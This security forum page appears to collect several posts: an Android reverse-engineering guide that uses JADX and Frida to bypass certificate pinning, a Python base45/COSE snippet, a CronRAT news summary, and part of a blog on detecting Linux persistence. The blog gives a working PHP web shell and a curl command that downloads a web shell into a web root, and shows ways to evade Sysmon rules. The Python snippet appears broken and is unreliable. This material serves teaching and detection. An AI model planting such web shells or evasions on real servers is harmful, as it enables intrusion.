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  2. Reverse engineering & modifying Android apps with JADX & Frida I get a lot of emails from users who want to know exactly what their favourite Android app is doing, and want to tweak and change how that works for themselves. There are some great tools to do this, including JADX & Frida, but using these is complicated, and every reverse engineering problem has its own unique challenges & solutions. There's few good guides to getting started, and even fewer guides on the advanced tricks available. In this article, I want to talk you through the core initial steps to look inside any Android app, give you the tools to find & understand the specific code that matters to you, and then show you how you can use that information to modify the app for yourself. Let's set the scene first. Context I'm assuming here that somebody else has written an Android app that you're interested in. You want to know exactly how a specific bit of behaviour works, and you want to change what it's doing. I'm going to focus on the classic HTTP Toolkit user example here of certificate pinning: where security-conscious apps that send HTTPS traffic go beyond the normal HTTPS validation requirements, and actively check that the HTTPS certificates used are from a small set of specific trusted certificates, not just the standard set trusted by all Android devices. (I'm focusing on certificate pinning because it's a common use case and it's convenient, but the techniques here work for all other kinds of reverse engineering & patching too, don't worry!) Certificate pinning is a problem for HTTP Toolkit users, who are trying to intercept HTTPS traffic to see what messages their Android apps are sending & receiving. It's not possible to intercept these app's traffic because they won't trust HTTP Toolkit's certificate, even after it's been injected into the device's system certificate store. Using the tools we're going to talk about in a moment we can take an unknown 3rd party app, find the certificate pinning code within it, and disable that remotely while the app runs on our device. This makes it possible to intercept, inspect & mock all of its traffic in any way we like! This isn't not easy, but it's usually not necessary. For starters, 99% of apps don't use certificate pinning beyond Android's standard restrictions, and for that case if you use HTTP Toolkit on a rooted device you're done in one click. For most apps that do explicitly pin their certificates, you can disable that using this general-purpose Frida script which already knows how to disable all the most popular cert pinning libraries available. In some cases though apps implement their own custom certificate pinning logic, or do something else unusual, which means the general-purpose script can't recognize and disable the right APIs. In these kinds of cases, or if you're trying to modify any other kinds of app behaviour, you need to roll up your sleeves and get your hands dirty. For this article, I've prepped an certificate pinning demo app: Each button sends an HTTPS request, and validates the connection in a slightly different way. The 'unpinned' option does nothing, the next 4 use various standard pinning techniques, and the last button uses totally custom code to manually check the certificate. If you use this with HTTP Toolkit normally, you can only intercept the first request. If you use the general-purpose Frida script, you can intercept the next 4 too, but not the last one. In this article we're going to focus on that last button, reverse engineer this app to see how it works, and write a custom Frida script to disable the certificate checking functionality. The Plan To reverse engineer an app and hook some behaviour, there's a few core steps you need to work through: Download a copy of the app on your computer Extract the source code Find the code we're interested in Understand how that code works Write a Frida hook to change how that code works Download the app Android apps are generally published to the Google Play store, but you can't easily download the app from there directly to mess around with on your computer. Fortunately, many sites that mirror the Google Play store, and do provide direct downloads of almost all available apps. ApkMirror.com and ApkPure.com are two good examples. In the general case, you should go to your favourite APK mirror site, and download the latest APK for the app you're interested in. In this specific case, I wrote the app, so I've conveniently published it directly on GitHub. You can download its APK here. Android app formats What is this APK file? Let's start with some quick but necessary background on Android app formats. There's two distribution formats you'll run into: APKs (older) and XAPKs (newer, also known Android App Bundles). In this example, the app is provided as a single APK, so that's easy enough, but many other apps you'll run into may be XAPKs, so it's worth understanding the difference. APKs are fairly simple: they're a ZIP file with a bunch of metadata, all the application's assets & config files, and one or more binary .dex files, which contain the compiled application. XAPKs are more complicated: they're a zip file that contains multiple APKs. In practice, they'll contain one large primary APK, with the main application code & resources, and then various small APKs which include the config or resources only relevant to certain types of devices. There might be separate config APKs for devices with larger screens, or different CPU architectures. For reverse engineering you usually just need the main APK, and you can ignore the rest. Extract the code Inside the APK, if you open it as a zip, you'll find a large classes.dex file (for multidex apps, there might even be a classes2.dex or more). These DEX files contain all the JVM classes of the application, in the compiled bytecode format used by Android's Runtime engine (ART, which replaced Dalvik a few years back). These DEX files contain the compiled application, but do not contain all the original source. Many things, most notably including local variable names & comments, are lost when compiling an Android application, and it's always impossible to extract those from the app. The external interfaces of each class are generally present here though (assuming that obfuscation wasn't used). That will usually be enough to find the method that you're interested in. Using those external interfaces you can usually then deduce what each line is trying to do, and progressively rename variables and add your own comments until you have some code that makes sense. To start that process, we need to convert the DEX file into a format we can mess around with ourselves. The best tool to do this is JADX (you can download it from their GitHub release page). Once JADX is installed, you run it like so: jadx ./pinning-demo.apk This will create a folder with the same name as the APK, containing 'resources' and 'sources' folders. The sources folder is what we're interested in: this is JADX's best guess at the Java source code that would've generated this DEX file. It's not perfect, but it should be pretty close. If you use JADX on the latest pinning demo APK, you'll find a structure like this: sources/ android/ - the core Android classes androidx/ - Android Jetpack classes com/ android/volley/ - The Volley HTTP client datatheorem/android/trustkit - One of the popular pinning libraries used google/ - Firefox, GSON & various other Google packages kotlin/ - runtime components of Kotlin okhttp3/ - OkHttp3, a popular HTTP library [...various other namespaces & packages] tech/httptoolkit/pinning_demo/ - the main application code Once you've extracted the code from an app like this, you can explore it any way you like - using Android Studio, using any other text editor, or just grepping for interesting text, it's up to you. By default, I'd recommend using some editor that can highlight and do basic automated refactoring (variable renaming) on Java code, since that'll make the next steps much easier. Find the code you care about Which code you want to reverse engineer & hook depends on the problem you're trying to solve. In my case, the problem is that when I intercept the app's HTTP using HTTP Toolkit and press the "Manually pinned request" button, I get a "Certificate rejected" message in HTTP Toolkit, and I want to stop that happening. That message typically means that the app is pinning a certificate - i.e. even though the HTTP Toolkit certificate is trusted on the device, the app is including its own custom checks, which are rejecting the HTTPS certificates and blocking HTTP Toolkit's automatic HTTP interception. So, the goal here is to find out which bit of code is making the custom-checked HTTPS request behind that last button, find out where that checks the certificate, and then later disable that check. Whatever code you want to change in your case, there are a lot of tricks available to help you hunt it down. Let's try out a few different approaches on this demo app. Search for relevant strings In my case, I know the failing request is going to sha512.badssl.com (a known-good HTTPS test site) so searching for that is a good start. That works, and gives me a few different places in the code that are sending requests, but there's options here for all the different possible pinning mechanisms, and related config files too. It's not immediately clear which code is relevant, so it'd be better to find something more precise. Some other strings that might be interesting, for the certificate pinning case: checkCert validateCert pinning pinner certificate SSL TLS Here you're looking for anything might be included in the name of a class, field or method, or which might be included in strings (e.g. error messages), since all of that will be preserved and searchable in the decompiled code. For example, if you're trying to understand where some HTTP API data comes from, you could try searching for the API endpoint path, or the name of query parameters. If you're looking for the implementation of a specific algorithm, it's worth searching for the common domain terms in that algorithm, or if you're trying to extract secrets or keys from the app then 'secret', 'key', and 'auth' are all worth investigating. Search for usage of relevant Java APIs Although local variable names aren't available, and in obfuscated apps even the class & package names may be obscured, the built-in JVM classes & package names are always available and unchanged. That means they're a great way to find related functionality. If you know the code you're interested in is likely to be using a certain data type, calling a specific API, or throwing a certain type of exception, you can use that to immediately narrow down your search. In this example, I think it's likely that all manual certificate checks are going to be using java.security.cert.X509Certificate, so I can search for usages of that type. This does give some good answers! Unfortunately though the entire app is filled with lots of different ways to do certificate pinning, by design, so this still comes back with a long list of matches, and it's not easy to tell which is relevant immediately. In most other apps that won't be a problem (most apps implement certificate pinning just the once!) and we could trawl through the results, but for now it's better to test out some other options first. Check for HTTP error reports Many apps nowadays include automatic error reporting using tools like Sentry. This is useful to app developers, but also to reverse engineers! Even when the app's own requests may use certificate pinning, requests sent by external libraries like these generally will not, so they're inspectable using HTTP Toolkit (or any other HTTP MitM proxy). That's useful because those requests themselves will usually include the stacktrace for any given error. This provides an excellent way for finding the source of any errors that you want to work around: Intercept traffic from your device using HTTP Toolkit or another proxy Trigger the error Look through the captured HTTP traffic for error reports Find the stacktrace in the relevant error report Follow the stacktrace into the codebase extracted earlier to immediately find the relevant code Bingo! In this case though, we're out of luck, as it's a tiny demo app with no error reporting. More searching required. Check ADB for errors Very commonly, apps will log errors and extra info to the console for easy debugging. Android captures this output from all running JVM processes in a single output buffer, along with stack traces from all uncaught errors, and makes that accessible via ADB using the logcat command. Outputting errors and debug info here is especially common in smaller apps which don't use an automated error reporting tool, so if you're looking to find & change some code that throws errors it's a great alternative to the previous approach. Even in non-error cases, the output here can provide excellent clues about application behaviour at the moments you're interested in. To capture the logs from a device, run: adb logcat -T1 This will stream the live logs from your device, without the history, until you stop it. It's often useful to pipe this to a file instead (i.e. ... > logs.txt) to save it for more detailed later analysis, since there can be a lot of noise here from other activity on the device. While this command is running, if you reproduce your error, you'll frequently find useful error stacktraces or error messages, which can then guide you to the right place in the code. For our demo app, this works great. By enabling logging when pressing the button, if you look carefully between the other noisy log output, we can now get the specific error message unique to that button: > adb logcat -T1 --------- beginning of main ... 11-22 10:46:16.478 31963 31963 I Choreographer: Skipped 114 frames! The application may be doing too much work on its main thread. 11-22 10:46:16.996 1785 1785 D BluetoothGatt: close() 11-22 10:46:16.997 1785 1785 D BluetoothGatt: unregisterApp() - mClientIf=5 11-22 10:46:17.000 791 1280 I bt_stack: [INFO:gatt_api.cc(1163)] GATT_CancelConnect: gatt_if:5, address: 00:00:00:00:00:00, direct:0 11-22 10:46:17.092 573 618 D LightsService: Excessive delay setting light 11-22 10:46:17.258 282 286 E TemperatureHumiditySensor: mCompEngine is NULL 11-22 10:46:18.773 26029 26129 I System.out: java.lang.Error: Unrecognized cert hash. 11-22 10:46:19.034 26029 26080 W Adreno-EGL: <qeglDrvAPI_eglGetConfigAttrib:607>: EGL_BAD_ATTRIBUTE ... We can search the codebase for this Unrecognized cert hash error message, and conveniently that message is shown in exactly one place. This error is appears deep inside invokeSuspend in MainActivity$sendManuallyCustomPinned$1.java: throw new Error("Unrecognized cert hash."); Explore the code in depth Still stuck? At this point, your best bet is to try and explore the application more generally, or to explore around the best clues you've found so far. To do so, you can use the manifest (in resources/AndroidManifest.xml) to find the entrypoints for every activity and background service registered in the application. Start with the services (i.e. background processes) or activities (i.e. a visible page of the UI) that sound most relevant to your situation, open up the corresponding source, and start digging. This can be time consuming. Keep going! You don't need to dig into every detail, but walking through here can quickly give you an idea of the overall architecture of the app, and you can often use this to find the code that's relevant to you. It's well worth keeping notes & adding inline comments as you go to keep track of the process. Understand the code Hopefully by this point you've found the code that's relevant to you. In this demo app, that code decompiled by JADX looks like this: public final Object invokeSuspend(Object obj) { IntrinsicsKt.getCOROUTINE_SUSPENDED(); if (this.label == 0) { ResultKt.throwOnFailure(obj); this.this$0.onStart(R.id.manually_pinned); boolean z = true; try { TrustManager[] trustManagerArr = {new MainActivity$sendManuallyCustomPinned$1$trustManager$1()}; SSLContext instance = SSLContext.getInstance("TLS"); instance.init(null, trustManagerArr, null); Intrinsics.checkExpressionValueIsNotNull(instance, "context"); Socket createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443); if (createSocket != null) { SSLSocket sSLSocket = (SSLSocket) createSocket; SSLSession session = sSLSocket.getSession(); Intrinsics.checkExpressionValueIsNotNull(session, "socket.session"); Certificate[] peerCertificates = session.getPeerCertificates(); Intrinsics.checkExpressionValueIsNotNull(peerCertificates, "certs"); int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { z = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; Intrinsics.checkExpressionValueIsNotNull(certificate, "cert"); if (Boxing.boxBoolean(mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)).booleanValue()) { break; } i++; } if (z) { PrintWriter printWriter = new PrintWriter(sSLSocket.getOutputStream()); printWriter.println("GET / HTTP/1.1"); printWriter.println("Host: untrusted-root.badssl.com"); printWriter.println(""); printWriter.flush(); System.out.println((Object) ("Response was: " + new BufferedReader(new InputStreamReader(sSLSocket.getInputStream())).readLine())); sSLSocket.close(); this.this$0.onSuccess(R.id.manually_pinned); return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); } throw new TypeCastException("null cannot be cast to non-null type javax.net.ssl.SSLSocket"); } catch (Throwable th) { System.out.println(th); this.this$0.onError(R.id.manually_pinned, th.toString()); } } else { throw new IllegalStateException("call to 'resume' before 'invoke' with coroutine"); } } There's a lot going on here! The original code (here) is written in Kotlin and uses coroutines, which adds a lot of extra noise in the compiled output. Fortunately, we don't need to understand everything. To change this behaviour, we just need to work out what code paths could lead to the highlighted line above, where the error is thrown. As you can see here, JADX has taken some best guesses at the variable names involved in this code, inferring them from the types created (e.g. printWriter = new PrintWriter) and from the methods called (peerCertificates = session.getPeerCertificates()). This is pretty clever, and helps a lot to see what's happening. It's not perfect though. You can see from some inferred variables like createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443), where the variable has just taken the name of the method, or the z boolean variable, where no clues where available to infer anything useful at all. If you have experience with code like this it may be easy to see what's happening here, but let's walk through it step by step: The line we're interested in only runs if z is false, since the preceeding if (z) block ends with return. We can rename z to isCertValid (made easier by automated refactoring) and remove some Kotlin boilerplate to make the code immediately clearer, giving us code like: boolean isCertValid = true; //... int length = peerCertificates.length; int i = 0; while (true) { if (i >= length) { isCertValid = false; break; } Certificate certificate = peerCertificates[i]; MainActivity mainActivity = this.this$0; if (mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)) { break; } i++; } if (isCertValid) { // ... return Unit.INSTANCE; } sSLSocket.close(); throw new Error("Unrecognized cert hash."); The block before the if is while (true), so this code only runs after that breaks. The break commands happen after either checking all values (setting isCertValid to false) or after doesCertMatchPin returns true for one value. That means the exception is only thrown when doesCertMatchPin returns false for all values, and that method is indeed what causes our problem. This gives us a good understanding of the logic here: the code checks every certificate linked to a socket, and calls doesCertMatchPin from the MainActivity class to compare it to BADSSL_UNTRUSTED_ROOT_SHA256. This is an intentionally simple example. Real examples will be more complicated! But hopefully this gives you an idea of the process, and the same techniques of incremental renaming, refactoring and exploring can help you understand more complex cases. It's worth noting that the relatively clear code here isn't always available, usually because obfuscation techniques are used to rename classes, fields & methods throughout the code to random names (a, b..., aa, ab...). In that case, the same process we're discussing here applies, but you won't have many of the names available as clues to start with, so you can only see the overall structure and references to built-in JVM APIs. It is still always possible to reverse engineer such apps, but it's much more important to quickly find the precise code that you're interested in before you start, and the process of understanding it is significantly more difficult. That's a topic for another blog post though (watch this space). Patch it with Frida Once we've found the code, we need to think about how to change it. For our example here, it's easy: we need to make doesCertMatchPin return true every time. Be aware Frida gives you a lot of power to patch code, but the flexibility is not unlimited. Frida patches are very focused on method implementation replacement, and it's very difficult (if not impossible) to use Frida to patch to individual lines within existing methods. You need to look out for method boundaries at which you can change behaviour. For certificate pinning, that's fairly easy, because certificate checks are almost always going to live in a separate method like checkCertificate(cert), so you can focus on that. In other cases though this can get more complicated. In this specific case, we're looking to patch the doesCertMatchPin function in the tech.httptoolkit.pinning_demo.MainActivity class. Within a Frida script, we first need to get a reference to that method: const certMethod = Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin; Then we need to assign an alternative implementation to that method, like so: certMethod.implementation = () => true; After this patch is applied, the real implementation of that doesCertMatchPin method will never be called, and it'll just return true instead. This is a simple example. There's many more complex things you can do though. Here's some examples: // Disable a property setter, to stop some fields being changed: const classWithSetter = Java.use("a.target.class"); classWithSetter.setATargetProperty.implementation = () => { return; // Don't actually set the property }; // Wrap a method, to add extra functionality or logging before and after without // changing the existing functionality: const classToWrap = Java.use("a.target.class"); const originalMethod = classToWrap.methodToWrap; classToWrap.methodToWrap.implementation = () => { console.log('About to run method'); const result = originalMethod.apply(this, arguments); console.log('Method returned', result); return result; }; // Hook the constructor of an object: const classToHook = Java.use("a.target.class"); const realConstructor = classToHook.$init; classToHook.$init.implementation = () => { // Run the real constructor: realConstructor.apply(this, arguments); // And then modify the initial state of the class however you like before // anything else gets access to it: this.myField = null; }; There's a huge world of options here - those are just some of the basic techniques at your disposal. Once you've found a method you want to patch and you've got an idea how you'll do it, you need to set up Frida (see this guide if you haven't done so already) to test it out. Once Frida is working you can test out your patch interactively, and tweak it live to get it working. For example, to test out our demo hook above: Attach HTTP Toolkit to the device Run the app, check that the "Manually pinned request" button fails and shows a certificate error in HTTP Toolkit. Start Frida server on the device Restart your application with Frida attached by running: frida --no-pause -U -f tech.httptoolkit.pinning_demo This will start the app, and give you a REPL to run Frida commands Run Java.perform(() => console.log('Attached')) to attach this process to the VM & class loader (it'll pause briefly, then log 'Attached'). Test out some hooks. For our demo app, for example, you can hook the certificate pinning function by running: Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin.implementation = () => true; Clear the logs in HTTP Toolkit, and then press the "Manually pinned request" button again It works! The button should go green, and the full request should appears successfully in HTTP Toolkit. Once you've something that works in a REPL, you can convert it into a standalone script, like so: Java.perform(() => { console.log("Patching..."); const mainActivityClass = Java.use("tech.httptoolkit.pinning_demo.MainActivity"); const certMethod = mainActivityClass.doesCertMatchPin; certMethod.implementation = () => true; console.log("Patched"); }); and then you can run this non-interactively with Frida using the -l option, for example: frida --no-pause -U -f tech.httptoolkit.pinning_demo -l ./frida-script.js That command will restart the app with the script injected immediately, so that that certificate pinning behind this button is unpinned straight away, and tapping the button will always show a successful result: If you want examples of more advanced Frida behaviour, take a look through the my cert unpinning script for certificate pinning examples for every popular library and some other interesting cases, or check out this huge selection of Frida snippets for snippets demonstrating all sorts of other tricks and APIs available. I hope you find this helps you to reverse engineer, understand & hook Android applications! Have questions or run into trouble? Get in touch on Twitter, file issues against my Frida script, or send me a message directly. Published 4 days ago by Tim Perry Sursa: https://httptoolkit.tech/blog/android-reverse-engineering/
    1 point
  3. #! /usr/bin/env python3 import json import sys import zlib import binascii import base45 import cbor2 from cose.messages import CoseMessage message="hello" if (len(sys.argv)>1): message=str(sys.argv[1]) en = base45.b45encode(message.encode()) print ("Message:\t",message,message.encode().hex()) print ("Encoded:\t",en.decode()) de = base45.b45decode(en) print ("Decode:\t\t",de.decode()) # compress using zlib compressed_data = zlib.compress(en, 2) #print('Compressed data: ' + binascii.hexlify(compressed_data)) # decode COSE message (no signature verification done) cose = CoseMessage.encode(compressed_data) # encode the CBOR encoded payload and print as zlib print(json.dumps(cbor2.loads(cose.payload), indent=2)) Cum zicea si colegul mai sus nu ai ce sa faci fara key https://pycose.readthedocs.io/en/latest/examples.html
    1 point
  4. Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day. Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet. CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk. "The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st." The RAT — a "sophisticated Bash program" — also uses many levels of obfuscation to make analysis difficult, such as placing code behind encoding and compression barriers, and implementing a custom binary protocol with random checksums to slip past firewalls and packet inspectors, before establishing communications with a remote control server to await further instructions. Armed with this backdoor access, the attackers associated with CronRAT can run any code on the compromised system, the researchers noted. "Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface." CronRAT: A New Linux Malware That's Scheduled to Run on February 31st (thehackernews.com)
    1 point
  5. Sursa: https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/frida-tutorial asta mi-a placut cel mai mult. Ai exemple cam pentru toate tipurile de date. hai sa facem un thread in care sa punem tot ce am gasit interesant despre frida.
    1 point
  6. Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery, and Webshells Nov 22, 2021 • Pepe Berba This blog series explores methods attackers might use to maintain persistent access to a compromised linux system. To do this, we will take an “offense informs defense” approach by going through techniques listed in the MITRE ATT&CK Matrix for Linux. I will try to: Give examples of how an attacker might deploy one of these backdoors Show how a defender might monitor and detect these installations By giving concrete implementations of these persistence techniques, I hope to give defenders a better appreciation of what exactly they are trying to detect, and some clear examples of how they can test their own alerting. Overview of blog series The rest of the blog post is structured with the following: Introduction to persistence Linux Auditing and File Integrity Monitoring How to setup and detect web shells Each persistence technique has two main parts: How to deploy the persistence techniques How to monitor and detect persistence techniques In this blog post we will only discuss web shell as a case study for logging and monitoring. We will discuss other techniques in succeeding posts. Throughout this series we will go through the following: Hunting for Persistence in Linux (Part 1): Auditing, Logging and Webshells Server Software Component: Web Shell Hunting for Persistence in Linux (Part 2): Account Creation and Manipulation Create Account: Local Account Valid Accounts: Local Accounts Account Manipulation: SSH Authorized Keys Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron Create or Modify System Process: Systemd Service Scheduled Task/Job: Systemd Timers Scheduled Task/Job: Cron Hunting for Persistence in Linux (Part 4): Initialization Scripts, Shell Configuration, and others Boot or Logon Initialization Scripts: RC Scripts Event Triggered Execution: Unix Shell Configuration Modification Introduction to persistence Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access [1] Attackers employ persistence techniques so that exploitation phases do not need to be repeated. Remember, exploitation is just the first step for the attacker; they still need to take additional steps to fulfill their primary objective. After successfully gaining access to the machine, they need to pivot through the network and find a way to access and exfiltrate the crown jewels. During these post exploitation activities, the the attacker’s connection to the machine can be severed, and to regain access, the attacker might need to repeat the exploitation step. Redoing the exploitation might be difficult depending on the attacker vector: Sending an email with a malicious attachment: The victim wouldn’t open the same maldoc twice. You’d have to send another email and hope the victim will fall for it again. Using leaked credentials and keys: The passwords might be reset or the keys are revoked Exploiting servers with critical CVEs: The server can be patched Because of how difficult the exploitation can be, an attacker would want to make the most out of their initial access. To do this, they install backdoor access that reliably maintain access to the compromised machine even after reboots. With persistence installed, the attacker no longer need to rely on exploitation to regain access to the system. He might simply use the added account in the machine or wait for the reverse shell from a installed service. 0 Linux Logging and Auditing 0.1 File Integrity Monitoring The configuration changes needed to setup persistence usually require the attacker to touch the machine’s disk such as creating or modifying a file. This gives us an opportunity to catch the adversaries if we are able to lookout for file creation or modification related to special files of directories. For example, we can look for the creation of the web shell itself. This can be done by looking for changes within the web directory like /var/www/html . You can use the following: Wazuh’s File Integrity Monitoring: https://documentation.wazuh.com/current/learning-wazuh/detect-fs-changes.html Auditbeat’s File Integrity Monitoring: https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html auditd For the blog posts, we will be using mainly auditd, and auditbeats jointly. For instructions how to setup auditd and auditbeats see A02 in the appendix. 0.2 Auditd and Sysmon 0.2.1 What is sysmon and auditd? Two powerful tools to monitor the different processes in the OS are: auditd: the defacto auditing and logging tool for Linux sysmon: previously a tool exclusively for windows, a Linux port has recently been released Each of these tools requires you to configure rules for it to generate meaningful logs and alerts. We will use the following for auditd and sysmon respectively: https://github.com/Neo23x0/auditd https://github.com/microsoft/MSTIC-Sysmon/tree/main/linux For instructions how to install sysmon refer to appendix A01. 0.2.2 Comparison of sysmon and auditd At the time of writing this blog post, sysmon for linux has only been released for about a month now. I have no experience deploying sysmon at scale. Support for sysmon for linux is still in development for agents such as Linux Elastic Agent see issue here I’m using sysmonforlinux/buster,now 1.0.0 amd64 [installed] While doing the research for this blogpost, my comments so far are: sysmon’s rule definitions are much more flexible and expressive than auditd’s rules depending on user input fields such as CommandLine` can be bypassed just like other rules using string matching. In my testing, sysmon only has the event FileCreate which is triggered only when creating or overwriting of files. This means that file modification is not caught by Sysmon (such as appending to files). This means that file integrity monitoring is a weakness for Sysmon. I’ve experienced some problems with the rule title displayed in the logs. Auditd rules can filter up to the syscall level and sysmon filters based on highlevel predfined events such as ProcessCreation, and FileCreate. This means that if a particular activity that you are looking for is not mapped to a sysmon event, then you might have a hard time using sysmon to watch for it. Overall, I’m very optimistic with using adopting sysmon for linux in the future to look for interesting processes and connections but would still rely on other tools for file integrity monitoring such as auditd or auditbeats. In windows, having only FileCreate okay since you have other events specific to configuration changes in registry keys RegistryEvent, but in Linux since all of the configurations are essentially files, then file integrity monitoring plays a much bigger role in hunting for changes in sysmte configuration. The good thing with sysmon, is that rules for network activities and process creation is much more expressive compared to trying to to use a0, a1 for command line arguments in auditd. We will discuss some of the findings in the next blog posts but some examples of bypasses are: T1087.001_LocalAccount_Commands.xml looks for commands that have /etc/passwd to detect account enumeration. We can use cat /etc//passwd to bypass this rule T1070.006_Timestomp_Touch.xml looks for -r or --reference in touch commands to look for timestamp modification. We can use touch a -\r b to bypass this or even touch a -\-re\ference=b T1053.003_Cron_Activity.xml aims to monitor changes to crontab files. Using echo "* * * * * root touch /root/test" >> /etc/crontab will bypass this because it does not create or overwrite a file, and in Debian 10 using the standard crontab -e will not trigger this because the TargetFilename is +/var/spool/cron/crontabs and the extra + at the start causes the rule to fail. You can see the different architectures for auditd and sysmon here: Redhat CHAPTER 7. SYSTEM AUDITING Lead Microsoft Engineer Kevin Sheldrake Brings Sysmon to Linux We see from the diagram from linuxsecurity.com that Sysmon works on top of eBPF which is an interface for syscalls of the linux kernel. This serves as an abstraction when we define sysmon rules, but as a consequence, this flexibility gives attackers room to bypass some of the rules. For example, in sysmon, we can look for a FileCreate event with a specific TargetFilename. This is more flexible because you can define rules based on patterns or keywords and look for files that do no exist yet. However, string matches such as /etc/passwd can fail if the target name is not exactly that string. Unlike in auditd, what is being watched are actions on the inodes of the files and directories defined. This means that there is no ambiguity what specific files to watch. You can even look for read access to specific files. However, because it watches based on inodes, the files have to exist what the auditd service is started. This means you cannot watch files based on certain patterns like <home>/.ssh/authorized_keys 0.3 osquery Osquery allows us to investigate our endpoints using SQL queries. This simplifies the task of investigating and collecting evidence. Moreover, when paired with management interface like fleetdm allows you to take baselines of your environments and even hunt for adversaries. An example from a future blog post is looking for accounts that have a password set. If you expect your engineers to always SSH via public key, then you should not see active passwords. We can get this information using this query SELECT password_status, username, last_change FROM shadow WHERE password_status = 'active'; And get results for all your fleet something similar to this +-----------------+----------+-------------+ | password_status | username | last_change | +-----------------+----------+-------------+ | active | www-data | 18953 | +-----------------+----------+-------------+\ Now why does www-data have a password? Hmm… Installation instructions can be found in the official docs Once installed simply run osqueryi and run the SQL queries. 1 Server Software Component: Web Shell 1.1 Introduction to web shells MITRE: https://attack.mitre.org/techniques/T1505/003/ A web shell is backdoor installed in a web server by an attacker. Once installed, it becomes the initial foothold of the attacker, and if it’s never detected, then it becomes an easy way to persistent backdoor. In our example, to install a web shell we add a bad .php file inside/var/www/html Some reasons this can happen are: the web application has a vulnerable upload API the web application has a critical RCE vulnerability the attacker has existing access that can modify the contents of the web root folder If the attacker can upload malicious files that run as php, then he can get remote access to the machine. One famous example of this is the 2017 Equifax Data Breach. You can read the report, but here’s my TLDR: The web server was running Apache Struts containing a critical RCE vulnerability. Attackers used this RCE to drop web shells which they used to gain access to sensitive data and exfiltrate the data. Around 30 different web shells was used in the breach. See the following resources: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload https://portswigger.net/web-security/os-command-injection 1.2 Installing your own web shells Note: If you want to try this out you can follow the setup instructions in the appendix A00. Assume we already have RCE, we add a file phpinfo.php that will contain our web shell. vi /var/www/html/phpinfo.php Choose any of the examples php web shells. For example: <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> Now anyone with access to http://x.x.x.x/phpinfo.php would be able to access the web shell and run arbitrary commands. What if you don’t have shell access? You might be able to install a web shell through an unrestricted upload. Upload your php backdoor as image.png.php and the backdoor might be accessible on [http://x.x.x.x/](http://x.x.x.x/)uploads/image.png.php . Another possible command that you can use is curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php 1.3 Detection: Creation or modification of php files Using auditbeat’s file integrity monitoring For some web applications, we might be able to monitor the directories of our web app in auditbeat’s file integrity monitoring. - module: file_integrity paths: - /bin - /usr/bin - /sbin - /usr/sbin - /etc - /var/www/html # <--- Add - module: system datasets: - package # Installed, updated, and removed packages When using _auditbeat’_s file integrity monitoring module, we see that looking at event.module: file_integrity Our vi command “moved” the file. In this case, moved is the same as updated because of how vi works. Where it creates a temporary file /var/www/html/phpinfo.php.swpand if you want to save the file it replaces /var/www/html/phpinfo.php An example of a command that will result in a created log would be if we ran curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php Using audit to monitor changes We can add the following rule to auditd -w /var/www/html -p wa -k www_changes And you can search for all write or updates to files in /var/www/html using the filter tags: www_changes or key="www_changes" The raw auditd logs looks like this type=SYSCALL msg=audit(1637597150.454:10650): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=556e6969fbc0 a2=241 a3=1b6 items=2 ppid=12962 pid=13086 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=11 comm="curl" exe="/usr/bin/curl" subj==unconfined key="www_changes", type=PATH msg=audit(1637597150.454:10650): item=0 name="/var/www/html" inode=526638 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597150.454:10650): item=1 name="backdoor_shell.php" inode=527243 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597150.454:10650): proctitle=6375726C0068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F686E54726F6F6E792F7068702D7765627368656C6C732F6D61737465722F436F6C6C656374696F6E2F5048505F5368656C6C2E706870002D6F006261636B646F6F725F7368656C6C2E706870 This allows us to note: euid=0 effective UID of the action exe="/usr/bin/curl” the command that was run name="/var/www/html" ... 